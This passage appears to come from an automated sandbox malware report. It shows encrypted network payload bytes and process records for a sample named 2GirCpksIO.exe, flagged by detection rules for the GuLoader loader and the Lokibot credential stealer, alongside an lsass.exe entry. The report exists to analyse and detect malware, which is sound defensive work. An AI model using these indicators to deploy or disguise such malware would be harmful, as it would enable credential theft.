                                2021-11-22 14:28:59 UTC94INData Raw: 84 30 71 45 8a 18 11 6c 07 2b 33 ee af 23 47 ea 28 42 44 0b a4 b0 67 d4 bd 3a 67 a1 4a a8 ee c4 37 da e9 9a bc 19 98 b9 dc 82 ca 4f ea ec 26 41 c9 68 53 95 e4 7a 1b 4e 18 97 11 24 b1 8f a4 87 ca 35 48 0a 9c 2e 2e f1 3e 34 0f 3a a0 f2 b9 e4 f7 05 e9 8d df 54 29 05 e0 03 42 9d 80 b8 1f 13 9e 4f 3a 1a 6b 43 1f e7 c5 59 81 3a 55 b2 ab 26 c7 c7 f2 d9 83 9a d2 1a 5a d6 35 73 58 09 8e fc 64 39 62 a0 a6 a7 d4 8c e3 f8 ac b1 e9 d6 e8 e8 6d 7a e1 e3 5c 4b 01 c1 0e d6 7e 10 9a 10 d6 3d 79 ac 47 e1 c1 ae 3d 00 a9 77 16 60 46 88 60 d2 e1 14 e6 e9 4d a4 e7 70 60 15 86 64 36 f5 40 84 ad ae 73 cc f0 b5 90 e8 f2 44 8b 88 52 d3 26 aa f8 40 91 f6 2e a5 77 31 11 dd c3 cb 8f 0b dd 1c 7c 39 e5 01 dc f5 25 cd 46 53 7d 5b c9 58 3b 92 19 99 a0 ce 32 7b 3f f7 81 d5 8a 90 00 50 ab
                                Data Ascii: 0qEl+3#G(BDg:gJ7O&AhSzN$5H..>4:T)BO:kCY:U&Z5sXd9bmz\K~=yG=w`F`Mp`d6@sDR&@.w1|9%FS}[X;2{?P
                                2021-11-22 14:28:59 UTC101INData Raw: f3 1a 91 04 47 c9 0b 5d 72 6a f2 2c ea a4 c0 af 82 d5 fb d0 8d 3f cc be 5f 80 38 68 01 94 93 3a 2e 44 11 eb c7 a6 c7 85 9a 54 6d 3d a5 25 2e 44 55 69 f6 55 51 2c e4 7e 7e 1e 6a 4a 47 87 c0 4d 7d ca 40 36 30 7b 9e 9f 48 a3 ca 4d 49 c8 28 db 8b aa 44 b5 8f ee cb 78 ea dc f2 e1 a5 22 c5 e1 2c 4c c3 68 53 95 e4 7a 1b 4e 18 97 11 24 b1 8f a4 87 ca 35 48 0a 9c 2e 2e f1 3e 34 0f 3a a0 f2 b9 e4 f7 05 e9 8d df 54 29 05 e0 03 42 9d 80 b8 1f 13 9e 4f 3a 1a 6b 43 1f e7 c5 59 81 3a 55 0f 1c 68 ac 06 d7 f4 87 6c 04 4e b6 0b 97 11 75 66 0b f7 33 14 68 a8 b7 e3 db e4 07 b0 d6 e2 67 d6 e8 e8 6d ec d1 e4 2b 67 60 cf e0 6c 2f 19 03 09 12 50 7e 23 b3 8b b1 9b 98 63 40 d4 83 04 d8 ba e8 09 ef b0 5e 35 34 ba 0e a5 80 9d 5f b6 a1 de 0c 32 a4 13 0f 7d 8e b2 bd 50 15 d5 96 37 c2
                                Data Ascii: G]rj,?_8h:.DTm=%.DUiUQ,~~jJGM}@60{HMI(Dx",LhSzN$5H..>4:T)BO:kCY:UhlNuf3hgm+g`l/P~#c@^54_2}P7


                                Code Manipulations

                                Statistics

                                Behavior


                                System Behavior

                                General

                                Start time:15:27:32
                                Start date:22/11/2021
                                Path:C:\Users\user\Desktop\2GirCpksIO.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\2GirCpksIO.exe"
                                Imagebase:0x400000
                                File size:114688 bytes
                                MD5 hash:5CC619F7DD365EC061F1F385D25BEA30
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:15:28:06
                                Start date:22/11/2021
                                Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                Imagebase:0x7ff74e590000
                                File size:57856 bytes
                                MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:15:28:16
                                Start date:22/11/2021
                                Path:C:\Users\user\Desktop\2GirCpksIO.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\2GirCpksIO.exe"
                                Imagebase:0x400000
                                File size:114688 bytes
                                MD5 hash:5CC619F7DD365EC061F1F385D25BEA30
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:15:29:04
                                Start date:22/11/2021
                                Path:C:\Windows\System32\lsass.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\lsass.exe
                                Imagebase:0x7ff735390000
                                File size:59448 bytes
                                MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Code Analysis
